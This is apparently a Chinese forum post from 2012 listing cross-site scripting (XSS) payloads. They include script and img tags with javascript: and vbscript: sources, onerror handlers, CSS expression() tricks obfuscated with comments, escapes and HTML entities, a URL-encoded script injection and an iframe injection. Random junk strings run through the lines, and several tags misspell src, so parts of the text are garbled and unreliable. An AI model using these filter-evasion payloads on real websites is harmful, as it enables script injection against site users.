<script>alert("跨站")</script> (最常用) \) g) Q( j, u3 N7 @
<img scr=javascript:alert("跨站")></img># Z4 b1 ~3 C: ?6 v; J7 b
<img scr="javascript: alert(/跨站/)></img>
9 f: U; @* y2 x& V<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)7 z/ K9 ~+ i0 X* F. x
<img scr="#" onerror=alert(/跨站/)></img>
" M$ {- I4 l8 [" B: ^5 b! m. h0 ?- ]$ v<img scr="#" style="xss:expression(alert(/xss/));"></img>6 ~7 `3 \1 f8 X& L0 ]. n5 T8 L) I
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
0 m7 o7 V$ \- O, Q) A<img src=vbscript:msgbox ("xss")></img>) F; w; A- h& N( {4 ^
<style> input {left:expression (alert('xss'))}</style>
~( ], t$ i' F4 F4 U<div style={left:expression (alert('xss'))}></div>$ S: o* ^# j! \% B/ Q7 b
<div style={left:exp/* */ression (alert('xss'))}></div>, i0 E1 D. d1 T% A. u, c7 _# A* G
<div style={left:\0065\0078ression (alert('xss'))}></div>/ u3 e& ~! i, A0 r1 U( p, E
html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
5 K1 T3 \$ Z! F( f7 l$ A- R, p Junicode <div style="{left:expRessioN (alert('xss'))}">
6 `& H V: S v8 w0 k
) q- u% }( A" _( \% {4 B"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["
' T9 \9 w0 h- Q; ^& L |
发表于 2012-9-15 14:09:13
收藏
分享
支持
反对